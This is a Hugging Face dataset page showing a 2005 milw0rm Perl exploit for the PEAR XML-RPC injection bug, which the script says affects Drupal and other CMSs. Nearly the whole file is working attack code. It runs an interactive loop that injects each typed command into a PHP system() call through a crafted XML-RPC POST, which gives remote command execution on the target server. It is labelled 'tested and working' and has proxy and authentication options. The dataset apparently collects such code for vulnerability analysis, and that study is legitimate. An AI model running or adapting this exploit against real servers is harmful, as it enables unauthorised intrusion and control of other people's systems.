Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1078.txt119 linesDownload Raw Back to exploits
1# tested and working /str0ke

2

3#!/usr/bin/perl

4# 

5#  ilo-- 

6#

7#  This program is no GPL or has nothing to do with FSF, but some

8#  code was ripped from romansoft.. sorry, too lazy!

9#  

10#  xmlrpc bug by James from GulfTech Security Research. 

11#  http://pear.php.net/bugs/bug.php?id=4692

12#  xmlrpc drupal exploit, but James sais xoops, phpnuke and other

13#  cms should be vulnerable.

14#

15#  greets: dsr! digitalsec.net

16#

17require LWP::UserAgent;

18use URI;

19use Getopt::Long;

20use strict;

21$| = 1;  # fflush stdout after print

22

23# Default options

24# connection 

25my $basic_auth_user = '';

26my $basic_auth_pass = '';

27my $proxy = '';

28my $proxy_user = '';

29my $proxy_pass = '';

30my $conn_timeout = 15;

31

32# general

33my $host;

34 

35 #informational lines to feed my own ego.

36 print "xmlrpc exploit - http://www.reversing.org \n";

37 print "2005 ilo-- <ilo".chr(64)."reversing.org> \n";

38 print "special chars allowed are / and - \n\n";

39

40 # read command line options

41 my $options = GetOptions (

42

43 #general options

44 'host=s'    => \$host, # input host to test.

45

46 # connection options

47 'basic_auth_user=s' => \$basic_auth_user,

48 'basic_auth_pass=s' => \$basic_auth_pass,

49 'proxy=s'           => \$proxy,

50 'proxy_user=s'      => \$proxy_user,

51 'proxy_pass=s'      => \$proxy_pass,

52 'timeout=i'         => \$conn_timeout);

53

54 # command line sanity check 

55 &show_usage unless ($host);

56

57 # main loop 

58 while (1){

59 	print "\nxmlrpc@# ";

60 	my $cmd = <STDIN>;

61 	xmlrpc_xploit ($cmd);

62 }

63

64 exit (1);

65

66#exploit 

67sub xmlrpc_xploit {

68chomp (my $data = shift);

69my $reply;

70

71my $d1 = "<?xml version=\"1.0\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a');";  

72my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall>";

73

74  $data =~ s/-/'.chr(45).'/mg;

75  $data =~ s/\//'.char(47).'/mg;

76

77  my $req = new HTTP::Request 'POST' => $host;

78  $req->content_type('application/xml');

79  $req->content($d1.'system(\''.$data.'\')'.$d2);

80  

81  my $ua = new LWP::UserAgent;

82  $ua->agent("xmlrpc exploit R/0.1");

83  $ua->timeout($conn_timeout);

84

85  if ($basic_auth_user){

86    $req->authorization_basic($basic_auth_user, $basic_auth_pass) 

87  }

88  if ($proxy){

89    $ua->proxy(['http'] => $proxy);

90    $req->proxy_authorization_basic($proxy_user, $proxy_pass);

91  }

92 

93  #send request, return null if not OK

94  my $res = $ua->request($req);

95  if ($res->is_success){

96     $reply= $res->content;

97  } else { 

98     $reply = "";

99  }

100  $reply =~ /(.*).(<pre>warning.*)/mgsi;

101  print ($1);

102}

103

104# show options 

105sub show_usage {

106  print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";

107  print "main options\n";

108  print "connection options\n";

109  print "\t--proxy (http), --proxy_user, --proxy_pass\n";

110  print "\t--basic_auth_user, --basic_auth_pass\n";

111  print "\t--timeout \n";

112  print "\nExample\n";

113  print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";

114  print "\n";

115  exit(1);

116}

117

118

119# milw0rm.com [2005-07-01]